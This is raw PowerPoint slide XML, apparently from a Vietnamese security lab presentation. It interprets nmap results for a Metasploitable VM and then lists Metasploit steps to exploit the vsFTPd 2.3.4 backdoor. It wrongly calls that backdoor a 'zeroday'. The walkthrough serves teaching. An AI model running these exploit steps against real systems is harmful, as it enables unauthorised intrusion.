              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đồ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>họa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Unix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6667/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped:IRC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Internet Relay Chat) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> chat IRC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8009/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>AJP (Apache JServ Protocol) - Một cổng thường được sử dụng bởi các ứng dụng Java EE như Tomcat để giao tiếp với các máy chủ web.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8180/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Thường được sử dụng cho các ứng dụng web hoặc dịch vụ dựa trên Java, có thể là một cổng mặc định cho một ứng dụng hoặc dịch vụ tùy chỉnh.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MAC Address: 08:00:27:EF:60:ED (Oracle VirtualBox virtual NIC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thấy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</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cổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mở</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3489287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89C76C-8E4C-414D-BCDF-8FAF3DF4D4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="396949"/>
            <a:ext cx="10515600" cy="5780014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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Đoạn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kết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quả</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bạn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cung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cấp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từ</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một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quét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cổng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mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (port scan) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cho</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thấy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cổng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đang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mở</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trên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một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máy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chủ</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hoặc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một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thiết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bị</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mạng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dịch</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vụ</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trên</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những</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cổng</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này</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đang</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được</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liệt</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kê</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là</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Unicode MS"/>
              </a:rPr>
              <a:t>tcpwrapped</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US"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rPr>
              <a:t>nghĩa</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rPr>
              <a:t>là</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rPr>
              <a:t>các</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rPr>
              <a:t>dịch</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rPr>
              <a:t>vụ</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rPr>
              <a:t>này</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rPr>
              <a:t>đang</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rPr>
              <a:t>sử</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rPr>
              <a:t>dụng</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rPr>
              <a:t>một</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rPr>
              <a:t>lớp</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rPr>
              <a:t>bảo</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rPr>
              <a:t>mật</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rPr>
              <a:t>như</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rPr>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>hoặc</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rPr>
              <a:t>một</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rPr>
              <a:t>dịch</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rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> proxy)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rPr>
              <a:t>để</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rPr>
              <a:t>che</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rPr>
              <a:t>giấu</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rPr>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> tin chi </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>tiết</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rPr>
              <a:t>về</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rPr>
              <a:t>chúng</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rPr>
              <a:t>Dưới</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rPr>
              <a:t>đây</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rPr>
              <a:t>là</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rPr>
              <a:t>một</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rPr>
              <a:t>số</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rPr>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>về</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rPr>
              <a:t>các</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rPr>
              <a:t>cổng</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rPr>
              <a:t>phổ</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rPr>
              <a:t>biến</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rPr>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> ta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rPr>
              <a:t>thấy</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rPr>
              <a:t>trong</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rPr>
              <a:t>kết</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rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exploid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4 backdoor) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gõ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gõ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ftp/vsftpd_234_backdoor: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (exploit) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mềm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Very Secure FTP Daemon) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhắm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cửa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hậu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Unix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425260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132381-8EE4-48E3-B7EA-76703ED1F67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="286439"/>
            <a:ext cx="10515600" cy="5890524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
